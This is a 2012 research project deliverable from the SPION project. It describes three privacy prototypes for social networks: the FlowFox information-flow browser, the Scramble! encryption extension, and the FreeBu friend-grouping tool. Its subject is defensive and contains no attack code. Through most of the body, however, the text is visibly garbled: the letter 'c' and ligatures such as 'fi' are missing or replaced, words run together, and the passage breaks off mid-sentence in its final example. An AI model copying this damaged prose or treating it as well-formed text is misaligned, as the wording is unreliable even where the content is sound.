Agentschap voor Innovatie door Wetenschap en Technologie IWT

SBO Security and Privacy for Online Social Networks

Document type Report

Title D9.1 – First iteration of software prototypes and

report describing those prototypes

Deliverable Number D9.1

Editor(s) E. Vanderhoven, T. Schellens, M. Valcke, OWK,

Ghent University

Dissemination level External

Preparation date 21 December 2012

Version 1.0

Legal Notice All information included in this document is subject to change without notice. The Members of the IWT SBO SPION project make no warranty of any kind with regard to this document, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose. The Members of the IWT SBO SPION project shall not be held liable for errors contained herein or direct, indirect, special, incidental or consequential damages in connection with the furnishing, performance, or use of this material.

1

The IWT SBO SPION Project

Nr. Participant name Country Department Participant role

1 KU Leuven BE COSIC/ESAT Coordinator 2 KU Leuven BE DISTRINET Partner 3 KU Leuven BE DTAI Partner 4 KU Leuven BE ICRI Partner 5 Vrije Universiteit Brussel BE SMIT Partner 6 University of Ghent BE OWK Partner 7 Carnegie Melon University USA Heinz Partner

Contributors

Name Organisation 1 Ellen Vanderhoven Ughent, OWK 2 Tammy Schellens Ughent, OWK 3 Martin Valcke Ughent, OWK 4 Willem De Groef KU Leuven, iMinds-DistriNet 5 Dave Clarke KU Leuven, iMinds-DistriNet 6 Frank Piessens KU Leuven, iMinds-DistriNet 7 Rula Sayaf KU Leuven, iMinds-DistriNet 8 Bo Gao KU Leuven, Dtai 9 Bettina Berendt KU Leuven, Dtai 10 Ero Balsa KU Leuven, COSIC 11 Claudia Diaz KU Leuven, COSIC 12 Seda Gürses KU Leuven, COSIC 13 Bart Preneel KU Leuven, COSIC

2

Content Table

Content Table ............................................................................................................................................... 3

Abstract ............................................................................................................................................ 4

1 General Introduction ................................................................................................................................ 5

2 FlowFox: a web browser to enforce information flow policies on web scripts .............................. 6

3 Scramble! A software tool for enforcing confidentiality and integrity on

social networking sites .................................................................................................................... 9

4 Freebu: a software tool for obtaining feedback from the system for privacy awareness ........................15

5 Overall conclusion .....................................................................................................................................19

References ....................................................................................................................................................20

3

Abstra tThis report des ribes three software prototypes that were developed bythe te hni al partners of the SPION-proje t, in lose ollaboration withthe user group. Ea h tool resolves spe i� priva y- and se urity problemsthat o ur when using so ial network sites (SNS). The �rst tool was de-veloped by iMinds�DistriNet and is a web browser ni knamed FlowFoxthat prevents online web s ripts from leaking sensitive or on�dential in-formation, a ording to a given user-de�ned poli y. The se ond tool, i.e.S ramble, was developed by COSIC and fo uses on keeping the ontentusers share in SNS on�dential, regardless of whi h priva y settings areavailable to the user in the SNS, by providing the users a means to en ryptthe ontent (e.g., messages, posts, omments) uploaded to the SNS. Fi-nally, the third tool FreeBu was developed by DTAI. It aims to help usersin re ognizing the grouping stru ture of their online onta ts, as well asin modifying these groups. Hereby, the tools try to o�er a solution for theproblem of ontext ollision on SNS.

4

1 General introdu tionThe SPION-proje t aims to develop on rete valorization out omes that aredeveloped and disseminated in lose ooperation with the members of the usergroups. Based on our dis ussions with the user group, we have identi�ed theneed for better tools for se urity and priva y prote tion. Current so ial net-working te hnologies la k usable me hanisms to ensure se urity and priva yprote tion. Therefore, the proje t aims to provide so ial network site-providersand developers with software tools to support the priva y-friendly priva y poli- ies and priva y-friendly default settings, that will be des ribed in the proje t-deliverable 9.3.The open-sour e software tools developed by the te hnologi alpartners of the proje t will address some of the existing priva y- and se urity on erns.More spe i� ally, three tools have been developed. The �rst tool is Flow-Fox [1℄, the �rst fully fun tional web browser that implements a pre ise and gen-eral information �ow ontrol me hanism for web s ripts, developed by iMinds�DistriNet. It is based on the te hnique of se ure multi-exe ution that supportpowerful, yet pre ise poli ies re�ning the same-origin-poli y in a way that is ompatible with both online so ial network sites (SNS) and regular web sites.FlowFox is also a fundamental build stone of the priva y-enhan ed so ial appli- ation platform PESAP [4℄.A se ond tool is a software plug-in to enable users to en rypt information andobtain on�dentiality properties, developed by COSIC. This tool aims to keepthe ontent users share in SNS on�dential, regardless of whi h priva y settingsthe servi e provider puts at the users' disposal in the SNS. Several SNS allowusers to de ide whether they want to share some information either with theirfriends, family, oworkers or any other list of onta ts. Other SNS have a mu hmore limited set of priva y settings, so that the users must de ide whether theywant the information to be ompletely publi or private but still a essible to alltheir onta ts. Furthermore, users must trust the SNS providers themselves andallow them to have a ess to their data. �S ramble!�, the tool proposed, providesusers with a means to enfor e their own priva y settings regardless of whi h SNSthey are using and the priva y settings urrently available in the SNS. The toolen rypts the ontent (e.g., messages, posts, omments) uploaded by the usersto the SNS for a ertain set of people previously sele ted by the users, so thatnobody else (even the servi e provider) is able to de rypt the uploaded ontentand therefore be able to a ess it. As a result, S ramble enfor es on�dentialityand integrity for ea h of pie e of data uploaded to the SNS. Moreover, the toolperforms en ryption and de ryption as well as integrity he ks automati ally,meaning that users never have to deal with omplex ryptographi te hniquesthemselves.The third tool is alled FreeBu and is developed by DTAI. It is a tool forobtaining feedba k from the system to raise priva y awareness. Indeed, in SNS it an be di� ult to maintain the ontext of a onversation or a tion, i.e. to knowwhat the situation is and how to a t appropriately. The resulting un ertaintiesmay lead to priva y issues. In developing the tool, there was a fo us on one issue,5

i.e. ontext ollision. We propose that a �rst step to address this issue is tohelp users distinguish groups of onta ts within their SNS-a ounts. Therefore,a small user study was ondu ted, to investigate the riteria of users groupingthe people they know. We summarized our parti ipants' strategies of labelingthe groups and found that they based the grouping mainly on their onne tionswith others. We used these results in the design of FreeBu, a semi-automati and intera tive grouping tool, whi h is based on mining friend graph data for ommunity dete tion and pro�le information for labeling.In what follows, all tools are des ribed more extensively. It is mentioned howdi�erent partners of the proje t ooperated to reate tools that are adapted tothe target users. A detailed des ription of the tool, together with a step-by-stepguide is given for every tool. Finally, it is on luded how these tools ontributeto the existing set of software tools.2 FlowFox: a web browser to enfor e information�ow poli ies on web s ripts2.1 Introdu tionAn important ontributor to the su ess of so ial networks is their support forthird-party appli ations. Su h appli ations provide so ial-enhan ed features orfun tionality (e.g. quizzes) or so ial games. With su h appli ations, the odeprovider is typi ally a third stakeholder, next to the so ial network provider andthe end users. Sin e these appli ations are so ial-aware, they need a ess toprivate information of the user to rea h their full potential. As a onsequen e,there is a strong need for se urity and priva y ontrols, and enfor ing su h ontrols is omplex be ause of the many stakeholders involved.In the ontext of web-based online so ial networks (the majority of urrentso ial networks are web-based), third-party appli ations are typi ally developedin s ripting languages like JavaS ript, and a ess ontrol or information �ow ontrol is addressed at the level of the s ripting language. These third-partyappli ations, like all web s ripts, are typi ally a ombination of markup and ex-e utable s ripts where the s ripts an intera t with their environment through a olle tion of powerful APIs that o�er ommuni ation to remote servers, ommu-ni ation with other pages displayed in the browser, and a ess to user, browserand appli ation information in luding information su h as the geographi al lo- ation, lipboard ontent, browser version and appli ation page stru ture and ontent. With the advent of the HTML5 standards, the olle tion of APIsavailable to s ripts has substantially expanded.An important onsequen e is that s ripts an be used to atta k the on�den-tiality or integrity of that information. S ripts an leak session identi�ers, inje trequests into an ongoing session, sni� the user's browsing history, or tra k theuser's behavior on a web site. Su h mali ious s ripts an enter a web page be- ause of a ross-site s ripting vulnerability, or be ause the page integrates thirdparty s ripts su h as advertisements, or gadgets. A re ent study has shown that6

almost all popular web sites in lude su h remotely-hosted s ripts [3℄. The im-portan e of these atta ks has led to many ountermeasures being implementedin browsers. The �rst line of defense is the same-origin-poli y (SOP) that im-poses restri tions on the way in whi h s ripts and data from di�erent origins an intera t. However, the SOP is known to have holes [5℄, and all of theatta ks ited above bypass the SOP. Hen e, additional ountermeasures havebeen implemented or proposed. Some of these are ad-ho se urity he ks addedto the browser (e.g. to defend against history- sni�ng atta ks, browsers re-sponded with prohibiting a ess to the omputed style of HTML elements [8℄),others are elaborate and well thought-out resear h proposals to address spe i� sub lasses of su h atta ks (e.g. AdJail [6℄ proposes an ar hite ture to ontainadvertisement s ripts).Several resear hers have proposed information �ow ontrol as a general andpowerful se urity enfor ement me hanism that an address many of these at-ta ks, and hen e redu e the need for ad-ho or purpose-spe i� ountermea-sures. Several prototypes that implement some limited form of information �ow ontrol have been developed. However, general, �exible, sound and pre ise in-formation �ow ontrol is di� ult to a hieve, and so far nobody has been able todemonstrate a fully fun tional browser that enfor es sound and pre ise informa-tion �ow ontrol for web s ripts. The tool developed by iMinds�DistriNet, i.e.FlowFox, is the �rst available web browser that an enfor e general information�ow se urity, based on on�dentiality poli ies on the intera tions between webs ripts and the browser.This tool has been developed in lose ollaboration with the other partnersof the SPION-proje t and the users. First, the frequent SPION meetings werethe ideal pla e for dis ussions amongst the di�erent partners. The out ome ofthese meetings has highly in�uen ed our resear h. Also the SPION te hni alworkshop and the numerous dis ussions with the parti ipants of the workshop, ontributed to the overall quality of our work. Se ond, we've had intense on-ta t with Netlog, one of our user group partners to dis uss several priva y issues on erning so ial appli ation platforms. Those dis ussions have in�uen ed ourresear h in general and more parti ular our work on priva y-enhan ed appli a-tion platforms [4℄.2.2 Des ription of the toolFlowFox is a fully fun tional web browser enhan ed with an information �owte hnology named se ure multi-exe ution [2℄. FlowFox is implemented on topof Mozilla Firefox 8.0.1. In pra ti e, FlowFox prevents web s ripts from leakingsensitive or on�dential information, a ording to a given user-de�ned poli y.FlowFox an also be applied in the ontext of an innovate priva y-enhan edso ial appli ation platform (PESAP) by preventing de-anonymized informationto leave the browser towards so ial appli ation platforms.The installation pro edure of FlowFox is the same as for an original MozillaFirefox. Depending on the used operating system, the pro edure, however,

7

an vary.1 The proje t home page ( https://distrinet. s.kuleuven.be/software/FlowFox/. ) ontains detailed instru tions on how to download &install FlowFox.The main installation idea on all operating systems is to (1)download the installation pa kage, (2) install the pa kage on your lo al ma hineand (3) run FlowFox.To download the installation pa kage, visit the FlowFox download page inany browser. On the download page, you will �nd a link to the latest FlowFoxversion. Depending on your onne tion speed, the download may take up to afew minutes. After downloading, you have to unpa k the installation pa kage,a ording the explanation on the download page. After the �rst step, the userends up with a dire tory ontaining all ne essary �les. The user an de ide toinstall FlowFox system-wide, however this is not required.At start-up, the user needs to spe ify a poli y �le. This poli y �le ontainsthe poli ies that will be enfor ed by FlowFox during the urrent session. Theinstallation pa kage omes with a pre- on�gured poli y �le. While sur�ng theweb, the user-de�ned poli ies are hidden for the user and are meant for ex-pert users only. An explanation on how to modify a on�dentiality poli y forFlowFox, is des ribed in detail on the proje t web site.On e the user starts sur�ng on the web, ea h pie e of JavaS ript will beexe uted under the se ure multi-exe ution regime, in orresponden e with thegiven poli y. If su h a web s ript doesn't leak sensitive information, the observ-able program semanti s will not hange. However, when a web s ript tries toleak sensitive information, FlowFox will �x the leak while trying to preserve theoriginal fun tionality of the s ript as mu h as possible.The following example shows how this pro ess works. Imagine the s enarioof a mali ious advertisement s ript, embedded in an online e-mail appli ation.The original behavior of this s ript would be twofold: to leak the ontent of theuser's inbox and to show a banner image. However, if this s enario would beexe uted within FlowFox, the user would still see some banner image � be ausethe fun tionality is preserved as mu h as possible �, but the leak will be losed.2.3 Con lusionSeveral resear hers have proposed information �ow ontrol as a general and pow-erful se urity enfor ement me hanism that an address many web s ript atta ks,and hen e redu e the need for ad-ho or purpose-spe i� ountermeasures. Sev-eral prototypes that implement some limited form of information �ow ontrolhave been developed. However, general, �exible, sound and pre ise information�ow ontrol for online web appli ations is di� ult to a hieve, and so far nobodyhas been able to demonstrate a fully fun tional browser that enfor es sound andpre ise information �ow ontrol for web s ripts. As a onsequen e, there was noeviden e for the pra ti ality of this approa h in the ontext of web appli ationsin general and so ial web appli ations in parti ular, up until now. We developedFlowFox, the �rst fully fun tional web browser that implements a pre ise and1We urrently only provide a build of FlowFox that requires Ubuntu Linux (32bit).8

general information �ow ontrol me hanism based on the te hnique of se uremulti-exe ution. In pra ti e, FlowFox prevents any web s ripts from leakingsensitive or on�dential information, a ording to a given user-de�ned poli y.In our main resear h paper [1℄, we have dis ussed the design, implementationand evaluation of FlowFox, a browser that extends Mozilla Firefox with a gen-eral, �exible and sound information �ow ontrol me hanism. FlowFox provideseviden e that information �ow ontrol an be implemented in a full-s ale webbrowser, and that doing so, supports powerful se urity poli ies without ompro-mising ompatibility. In our se ond paper [4℄, we presented a framework, thatin ludes FlowFox, for a priva y enhan ed so ial appli ation platform (PESAP),that te hni ally enfor es the prote tion of the personal information of a user,when intera ting with so ial appli ations.3 S ramble! A software tool for enfor ing on-�dentiality and integrity on so ial networkingsites3.1 Introdu tionCurrent so ial networking sites (SNS) provide a range of priva y settings forusers to on�gure and de ide who an a ess the ontent they upload to thesite. Several issues arise from this situation. To begin with, the priva y settingsare unilaterally designed and enfor ed by the servi e provider. This means thatthe user has a limited set of hoi es regarding who is able or unable to a essthe ontent he/she uploads to the site. For example, the servi e provider mayprovide the user with few hoi es: either all data will be publi to all users onthe Internet, either just to his/her full list of friends or either just to his/herself.Hen e, this limited set of hoi es may be in on�i t with the user's desire toshare ertain items of information with just a subset of his/her friends, with thisset being di�erent for ertain items of information and dynami in time. Thela k of �exible and easily tunable priva y settings may ause users to per eivetheir priva y as being violated and even for e them to refrain from uploading ontent to the SNS.Be ause the priva y settings are unilaterally enfor ed by the servi e provider,the provider may as well de ide to hange them at any given time, even aftergiving no noti e. Changes in priva y settings dire tly a�e t the visibility of the ontent users upload to SNS, making it available to a wider or shorter audi-en e than the user initially intended. Both the widening and narrowing of theavailability of users' ontent may a�e t seriously the users' priva y. On the onehand, making the users' data available to a wider audien e potentially dis losessensitive information to parties the users might rely on not being dis losed to,e.g., a user organizing a surprise party for a friend relies on information aboutthis party not being available to this friend. On the other hand, making theusers' data available to a narrower audien e potentially prevents users poten-9

tially expe ted by the user from a essing that information, e.g., informationabout the surprise party is not available to all the invited guests anymore.Lastly, regardless of how oarse or �ne grained the priva y settings designedby the servi e provider are, the provider is able to a ess all the users' data.This means that all the a tivities performed on and the ontents uploaded tothe online so ial network are being monitored and pro essed by a single, all-powerful entity. Users unwilling to dis lose their information to the servi eprovider have no hoi e but to refrain using the servi e. All other users mayfa e several priva y threats resulting from the olle tion of highly sensitive databy the servi e provider: from insider atta ks by the provider employees to thepressure of the poli e or any other law enfor ement authorities, from the datamining performed by marketeers and the pressure of ompanies to gather a u-rate information about onsumer's hoi es and behaviours, the servi e providermay leak intentionally or unintentionally very sensitive and personal informationfrom the users.S ramble!, the tool we present in this do ument, aims at solving all threeproblems aforementioned, by means of en ryption. This provides an alternativefor the user to de ide who is able to a ess to the data she uploads on the SNS,so that no unauthorised user, in luding the servi e provider, is able to a esshis/her data, regardless of the site's priva y settings and further hanges on thesesettings. Previous works su h as Lo kr [16, 15℄, NOYB [17℄ or Fa eCloak [18℄have provided a similar solution to these problems, namely, a solution based on ryptographi te hniques implemented either as a browser plug-in or a Fa ebookappli ation. The main di�eren e between these solutions and S ramble! is thatwhereas the former are platform spe i� , S ramble! is SNS-independent, i.e., it an be used in any site.S ramble! has been developed in lose ollaboration with the other partnersof the SPION-proje t. This ollaboration is varied and happens at di�erentfrequen y, intensity and levels. First of all, our frequent SPION meetings arethe perfe t opportunity to dis uss the details and intri a ies of our resear h andthe development of the valorization tool. In these meetings we obtain valuablefeedba k for better designing and improving our tool. Moreover, through thejoint examination of the on eptual framework inherent to the SPION proje t wehave ome a ross several issues that are important for the su essful developmentof our tool.Indeed, iMinds-SMIT has arisen our resear h interest on several priva y is-sues, su h as ontext ollision[10℄, ontext ollapse[7℄, invisible audien es [14℄andthe blur between publi and private[7℄, to whi h our tool has managed to pro-vide a solution. Moreover, iMinds-SMIT has mentioned serious priva y problemsstemming from the un ons iousness of what is happening with the users' dataonline. Be ause our tool uses robust en ryption te hniques, any leaked dataare en rypted thus no unauthorised party an a ess to their ontent. Finally,iMinds-SMIT has highlighted the importan e of developing tools that while ta k-ling the raised priva y issues do not imperil the positive features represented bySNS.Intera tion with OWK helps us developing a more pedagogi al language to-10

wards ommuni ating with users and understanding their needs. This is impor-tant in order to be able to in lude their requirements in the developing pro ess,as targeting the priva y problems users per eive is the essen e of this tool. Fur-thermore, intera tion with iMinds-DistriNet and DTAI (the two other te hni alpartners in SPION) has provided us valuable feedba k regarding how to addressother priva y problems from a te hni al perspe tive, as well as highlighting the ore problems to users' priva y in online so ial networks.Finally, we are starting to losely ollaborate with CMU. We have started onversations about the evaluation of the tool from the e onomi s of priva yand behavioural e onomi s points of view. Guided by the expertise of CMU inthose �elds, we are planning to exe ute a thorough evaluation. The result ofsu h evaluation should shed light on several questions related to understandingthe behaviour of the users of the tool. Understanding how the priva y per- eption of users hanges when using the tool, whether or not their behaviour hanges as they are given more ontrol over the dis losure of their data and towhat extent the tool meets their expe tations of priva y prote tion are amongstseveral questions that we want to answer with this evaluation. The results ofthis evaluation will be reported in SPION-deliverable 9.3 (Report ontaining�usability and behavioral evaluations of the software tools�).3.2 Des ription of the tool�S ramble!�, is a lient side appli ation implemented as a browser plug-in (aFirefox extension) that users an install on their omputers to keep their SNSdata on�dential. S ramble! generates ryptographi keys2 and automati allyen rypts the ontent users post in SNS so that only the friends they hoose toshare it with are able to de rypt it. Note that this requires other users to installS ramble as well, i.e., a user must install S ramble to be able to de rypt themessages sent or posted by their friends. For example, if Ali e uses S ramble!to send en rypted messages to her friends Bob and Charlie, they need to installS ramble to be able to read Ali e's messages3.S ramble therefore guarantees the on�dentiality of the users data' towardsany user or entity, su h as the servi e provider, that the users do not granta ess to. S ramble ontains an easy-to-use user interfa e for de�ning the set ofusers the data should be shared with.�S ramble!� provides a solution to users of so ial networking sites that eitherwant to on eal the ontent of the data they upload to the servi e provider,either are unsatis�ed with the priva y settings enfor ed by the so ial networkprovider, or both.After the users install �S ramble!� on Firefox, a small Rubik's ube i on will2The publi key pairs an also be provided by the user.3Stri tly speaking, this is not ne essarily true. Bob and Charlie ould manually generatetheir own publi key pairs, share them with Ali e and then de rypt the messages themselves.However, this would require Bob and Charlie being able to deal with ryptographi me ha-nisms. What S ramble! pre isely does is to manage omplex ryptographi operations in theba kground.11

appear at the right bottom of the browser window. This indi ates that S ramblewas su essfully installed. Right after installation, users an either ask S ramble!to generate ryptographi keys for them or use their own ryptographi keys.After generating the keys, S ramble! automati ally uploads the publi keys to aserver on the Internet so that the users' friends are able to retrieve them, whilekeeping the private key se urely on ea h user's omputer. In fa t, to obtain thekeys of their friends, users an either provide to S ramble! their users' friendse-mail addresses or also provide them dire tly to S ramble! from a text �le, forexample.After the key generation pro ess S ramble! is ready to use. In order todo that, users just write messages in the �elds provided in the SNS, as theywould normally. The only di�eren e while using S ramble is that, before post-ing/sending the message, the user sele ts the message4 of whi h he/she wants torestri t availability to a ertain subset of his/her onta ts. Then, the user right- li ks on the sele ted message to obtain the dialogue that leads to the S rambletool. Figure 1 shows this pro ess. The user sele ts S ramble → S ramble It!and is dire ted to a new window where he/she an sele t the people he/shewants to be able to de rypt the message.

Figure 1: Sele ting a message to be en rypted with S ramble!Alternatively, instead of right- li king the message, the user may li k onthe small rubik's ube at the right bottom of the browser window, where thesame option �S ramble It!� is available. This is shown in Figure 2.On e the option �S ramble It!� is sele ted, a new di�erent S ramble! windowis shown by the browser, as shown in Figure 3. In this window, the user is able4or part of the message12

Figure 2: Using the small rubik's ube i on in the browser to a ess S ramble!to sele t the onta ts he/she wants to share the message with. He/she an eithersele t full groups or hoose person by person, whatever the needs are. On e theuser sele ts the people wanted to a ess the message, one li ks done, and thewindow will be losed bringing the user ba k to the SNS.S ramble had en rypted by now the message with the spe ial S ramble head-ers, as shown in Figure 4. The message is now ready to be posted.On e the message has been posted, S ramble will de rypt the message au-tomati ally for the user, as well as for the onta ts hosen by the user to beable to de rypt and read the message. Therefore, no user has to deal with the ompli ated ryptographi te hniques used by S ramble. It is easy to use andtransparent to the user.S ramble an be downloaded here: http://sour eforge.net/proje ts/s ramble-it/files/latest/downloadInstru tions on how to install S ramble an be found here: http://homes.esat.kuleuven.be/fbeato/extras/s ramble/install.htmlInstru tions on how to use S ramble an be found here: http://homes.esat.kuleuven.be/fbeato/extras/s ramble/howto.html3.3 Con lusionWe have implemented S ramble, a Firefox extension that provides users witha way of enfor ing on�dentiality and integrity to the ontent they upload onso ial network sites. S ramble is SNS independent thus an be used in various13

Figure 3: S ramble sele tion dialogue, where the user an sele t the audien eallowed to a ess the message posted

Figure 4: The message en rypted by S ramble, ready to be posted in the SNSSNS, su h as Twitter, Fa ebook, Google+ or MySpa e. Furthermore, not onlyis it SNS independent, but it an also be used with other Web 2.0 servi es, su has blogs, forums and wikis. Potentially, it allows users to store data in en ryptedformat in any loud servi e.The extension allows the de�nition of groups to ease the task of sele tingwhi h users should be granted a ess to the user ontent, as well as the en- ryption of ontent under the keys of all group members. Using a publi keyen ryption s heme we are able to prote t the integrity and on�dentiality ofuser reated data, espe ially towards the servi e provider. S ramble is easy touse and transparent for the users, as it automati ally de rypts the ontent forthe authorised users.14

In addition to the on�dentiality and integrity properties previously men-tioned, that ta kle problems su h as unsuitable, umbersome or hanging pri-va y settings, as well as the pervasive monitoring of the servi e provider, thereis a substantial amount of added value that users an obtain through the useof S ramble. Be ause S ramble prevents the servi e provider from a essingthe information posted by the users in the SNS, it prevents inferen es made bymarketeers based on user data that ould lead to negative pri e dis riminationor intrusive targeted advertisement.Moreover, S ramble is publi ly available and free. Finally, S ramble is opensour e, meaning that the te hnology experien ed ommunity an tune it andkeep improving it to adapt to urrent non-addressed or future demands of theusers.4 Freebu: a software tool for obtaining feedba kfrom the system for priva y awareness4.1 Introdu tionOne priva y issue that has been widely dis ussed with regard to SNS is ContextCollision or Context Collapse [7, 9, 10℄. It refers to the situation that due tote hnology barriers and the large amount of information in SNS, a user fails tore ognize the boundaries between di�erent ontexts, and thus behaves inappro-priately towards others in an online so ial environment. For instan e, a usermight post something that is visible to undesired audien es or that is onsideredundesirable by some audien es. We re ognize that a �rst step to address thisissue is to help a user distinguish di�erent groups of people that he/she knowsonline, so that the information �ow towards supposedly di�erent people an bebetter managed by the user.Therefore, we developed a tool, i.e. Freebu, that aims to help users resolve ontext ollision by aiding them in re ognizing the grouping stru ture of theironline onta ts, as well as in modifying these groups. In the development pro- ess, �rst, we ondu ted a small user study to investigate what riteria usersemploy to group their friends and other people they know. This provided uswith a basis to generate des riptions (labels) of dete ted ommunities in the tool.Se ond, based on the �ndings from the user study, we motivated our hoi e foran approa h based on data mining. More spe i� ally, we used a graph-based ommunity dete tion algorithm to extra t groups of the user's onta ts. Third,we des ribed a method and an intera tive tool for ommunity dete tion andlabeling.FreeBu provides the user with a semi-automati grouping solution. It �rstpresents the user with a fully-automated grouping suggestion. As mentionedbefore, this suggestion is onstru ted based on our user study to mimi users'grouping behavior in general, so that the groups look natural or sensible to theuser. This saves the user a signi� ant amount of time, be ause he/she does notneed to ategorize all the friends into groups manually. Next, if the user feels like15

modifying the grouping stru ture, he/she an drag and drop people to di�erentgroups, reate new (sub)groups, or remove ertain (sub)groups. On e satis�edwith the grouping stru ture, users an dire tly publish the groups as friend listson their Fa ebook a ount. This means that a group in FreeBu orresponds toa friend list in the user's Fa ebook a ount. With su h an approa h, the user an reate friend lists e�e tively and e� iently.In our pro ess of developing this software tool, we ollaborated losely withthe other partners of the SPION-proje t. We had many meetings with iMinds-DistriNet, dis ussing ideas of underlying a ess ontrol models and top-levelinterfa es for assisting SNS users in general to prote t their priva y. Thesedis ussions fo used on the needed requirements, the de�nition of ontexts andhow these ontexts an be used, whi h be ame an inspiration for the later tooldevelopment.iMinds-SMIT's argument in deliverable 2.1 State Of The Art (SOTA) on thela k of situation or ontext in SNS is very relevant to our resear h. It pointedout the literature about ontext ollision or ontex ollapse whi h served asour dire t motivation for building our grouping tool for ontext management inSNS. iMinds-SMIT's fo us on the relationship between o�ine and online om-munities, espe ially the part on the lose onne tions between online and o�ineenvironment, led us to taking into a ount online as well as o�ine onta tsin the questions we asked during a small user study of grouping behavior, de-signed to inform tool development. Dis ussions with iMinds-SMIT also led usto adopt the method for grouping eli itation that they use: letting users re-ate tree stru tures to externalize their mental groupings. At the moment, weare ollaborating with iMinds-SMIT on an evaluation study of FreeBu, whi hwill be reported in SPION-deliverable 9.3 (Report ontaining �Evaluation ofthe software tools from the perspe tive of the user expe tations, pra ti es, and ontext of use).CMU listed several ases of information dis losure of users on So ial Net-working Sites and the priva y issues that stem from su h dis losure. CMU thenshowed several possible aiding strategies that have been des ribed in the liter-ature to prote t users' priva y, whi h in lude (1) �design approa hes in group ontext� and (2) �soft paternalism�. The former pointed out the need for themanagement of group ontexts in SNS, the latter emphasized that without oer- ion, te hnology an guide users to make more appropriate de isions on erningtheir priva y. Both have ontributed to the idea and the building of our groupingtool.OWK's omments on �raising awareness about information �ow� and �learnhow to build an online identity� mentioned in the �think before you post� se -tion in the SOTA also ontributed to the development of our tool. Further-more, OWK pointed out that among the urrent edu ational pa kages thatguide young users to prote t their priva y in using the internet, espe ially SNS,few refer to real te hni al skills like hanging the priva y settings. We onsiderour grouping tool with vivid visualizations as a possible aid for ountering thesepossible problems. However, although it helps dire ting the users' attentionto the priva y settings, FreeBu does NOT dire tly hange the user's priva y16

settings.4.2 Des ription of the toolThe tool we developed is alled FreeBu (Friend Tree Bubbles). It is a desktopappli ation that runs on user's Fa ebook friend graph and friend pro�le data.The friend graph and pro�le data are extra ted by a token submitter beforerunning the FreeBu tool. The tool is targeting any Fa ebook user.We propose an automati ally generated grouping based on the user's friendgraph on Fa ebook. This way, we aim to make the users re�e t about thegrouping of their friends and to in rease their awareness of existing friend groups.For the visualization of the result, we adopt the star-tree form to represent thegrouping stru ture. As shown in Figure 5, the nodes of the tree are representedby ir les and ea h pair of parent- hild nodes are onne ted by straight lines.The root of the tree (the blue ir le in the middle) represents the user, the red ir les represent di�erent ommunities dete ted by the algorithm, the leaves (thegreen ir les surrounding the red ones) represent the user's friends on Fa ebook.We s ale the sizes of ommunity ir les based on the number of people withinea h ommunity; a larger size orresponds to more people.The labels � in luding the number of people and the ommon hara teristi sof these people � are shown on top of the ommunity ir les. As an example, ifa ommunity ontains one person, only the number �1� is shown as a label toindi ate the number of people within this ommunity. The user an li k on onebubble � a ommunity or a person � to zoom in and on entrate on a parti ularpart of the tree. In this paper, we blurred the labels for priva y reasons. Thelabels are typi ally s hool names, s hool years and work pla es. The number infront of the blurred labels indi ates the number of people in the orresponding ir les. The user an adjust the number of labels shown by sliding the thresholdbar.Initially, we provide the user with one-layer grouping. The user an modifyit by adding or removing (sub) groups, as shown in Figure 6. The user an also hange the members of the groups by �dragging and dropping� friends from onered ir le to another, as shown in Figure 7.FreeBu and more detailed instru tions an be downloaded via this link:https://dl.dropbox. om/u/62772548/FreeBu.zip.4.3 Con lusionPeople within one ontext often share some ommon traits or onne tions thatthe people from other ontexts la k [12, 13℄. Therefore, one important fa torthat an distinguish di�erent ontexts are the persons in it [11, 13℄. Hen e,with FreeBu, we provide a SNS user with an easy way to identify di�erentgroups of people among the user's onta ts. The user an ��ne-tune� the group-ing stru ture a ording to his/her needs by intuitively dragging and droppingsome bubbles (that represent people) into other bubbles (that represent groups),

17

Figure 5: The overview of the user interfa e.Figure 6: The user an add new groups at di�erent levels of the star-tree, �Newgroup� is added at level two, atta hed to the level-one ir le labeled with �41�,�New group 1� is added at level one, dire tly atta hed to the �self� ir le. Theuser an also edit the labels of the ir les.Figure 7: On the left, three individuals are initially assigned into three di�erentgroups; On the right, the user move the three individuals into one group.

18

hange the group names, and eventually, the user an publish this grouping de- ision onto his/her Fa ebook a ount. This saves the user a signi� ant amountof time by substituting manually onstru ting friend lists. The user also gainsan overview towards his/her online friends, and is likely to post more appropri-ately to designated friends based on the groups. We believe that distinguishingdi�erent groups of people is a very important step towards online ontext man-agement.5 Overall on lusionThere have been several gaps in se urity- and priva y prote tion for users ofSNS. To answer the needs of users, servi e providers, and developers, threedi�erent software-tools were developed. Ea h tool tried to o�er a solution toanother se urity-problem.First, the urrent web infrastru ture does not provide adequate prote tionme hanisms against mali iously-behaving web s ripts (e.g. mali ious advertise-ments on online so ial network sites) that try to leak sensitive or on�dential in-formation from the user's browser towards the information-gathering endpoint ofan adversary. In order to assist the helpless internet user, iMinds-DistriNet de-veloped FlowFox, a fully fun tional web browser enhan ed with information �owte hnology. In pra ti e, FlowFox prevents web s ripts from leaking sensitive or on�dential information, a ording to a given user-de�ned poli y. FlowFox hasalso been su essfully applied in the ontext of an innovative priva y-enhan edso ial appli ation platform by preventing de-anonymized information to leavethe browser towards so ial appli ation platforms.The se ond tool, i.e. S ramble!, is developed by COSIC for any SNS user. It an be used to prote t the on�dentiality and integrity of the users' messages,posts or any other ontent uploaded to the SNS by means of en ryption. Thisway, no unauthorised party is able to a ess or modify those data. It is valuablebe ause it is freely available, open sour e, easy to use and it an be used ondi�erent (SNS) platforms.The third tool is alled FreeBu and is developed by Dtai for Fa ebook users.It an be used to automati ally generate friend lists for Fa ebook users. Theuser an gain an overview of his/her friends, re�e t on this overview and modifythe grouping stru ture. By doing so, the user makes more informed de isionson SNS.Although it may seem that the use of one of the tools des ribed above isenough to prote t your priva y, the following example will show that all toolspresented in this deliverable are omplementary. Therefore, the SNS-user willbe most prote ted when using all three of the tools.Imagine a 16-year old girl Ali e, who just had the number of her mobile phone hanged. Be ause she wants to ommuni ate her new mobile number to all ofher friends, she posts her new phone number on her Fa ebook pro�le-page, withher priva y-settings set to `friends-only'. The next day, she re eived a messageon her phone from her tea her, she was alled by an employer of Fa ebook for19

